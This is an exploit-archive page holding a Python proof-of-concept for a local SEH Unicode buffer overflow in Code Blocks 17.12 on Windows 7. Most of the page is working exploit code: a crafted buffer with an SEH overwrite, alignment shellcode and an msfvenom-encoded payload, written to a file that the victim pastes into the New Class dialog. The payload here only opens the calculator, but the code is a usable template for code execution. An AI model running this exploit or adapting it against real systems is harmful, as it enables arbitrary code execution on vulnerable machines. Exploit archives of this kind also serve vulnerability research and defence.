Code Blocks 17.12 Local Buffer Overflow

2019.01.12
Credit: bzyo
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: Code Blocks 17.12 - Local Buffer Overflow (SEH)(Unicode) # Date: 01-10-2019 # Vulnerable Software: Code Blocks 17.12 # Vendor Homepage: http://www.codeblocks.org/ # Version: 17.12 # Software Link: # http://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe # Tested Windows 7 SP1 x86 # # # PoC # 1. generate codeblocks.txt, copy contents to clipboard # 2. open cold blocks app # 3. select File, New, Class # 4. paste contents from clipboard into Class name # 5. select Create # 6. pop calc # filename = "codeblocks.txt" junk = "A"*1982 nseh = "\x61\x62" #0x005000e0 pop edi # pop ebp # ret | startnull,unicode {PAGE_EXECUTE_READ} [codeblocks.exe] seh = "\xe0\x50" nops = "\x47"*10 valign = ( "\x53" #push ebx "\x47" #align "\x58" #pop eax "\x47" #align "\x47" #align "\x05\x28\x11" #add eax "\x47" #align "\x2d\x13\x11" #sub eax "\x47" #align "\x50" #push eax "\x47" #align "\xc3" #retn ) nops_sled = "\x47"*28 #msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX #Payload size: 517 bytes calc = ( "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A" "IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXDBM0KPKP1PU9ZE01I0RD4KPPP0DK0RLL4KB2MD4KRRN" "HLO6WOZNFP1KOFLOLC13LKRNLMPI18OLMM17W9RKBB21GTKPRLPDKPJOL4K0LN1RXZCPHKQZ1PQ4K29O0KQXS4KOY" "N8YSOJOYDKNT4KKQXV01KOFLY18OLMM1GWOH9PSEKFM3SMZXOKSMNDT5ITPXDKPXMTKQ8SC6TKLL0KTKPXMLM1YCD" "KLDTKM1J0SYOTMTMTQKQKS10YQJB1KOIPQO1OQJ4KMBZK4MQM2JKQ4MTEX2KPKPKPPP2HP1TKBOTGKOZ5GKJP6UVB" "0V2HW65EGM5MKO8UOLLFSLLJU0KKIPRUKUWK0GMCCBRORJKPB3KOIE2CC1RLQSNNQU2X35M0AA") fill = "D"*10000 buffer = junk + nseh + seh + nops + valign + nops_sled + calc + fill textfile = open(filename , 'w') textfile.write(buffer) textfile.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top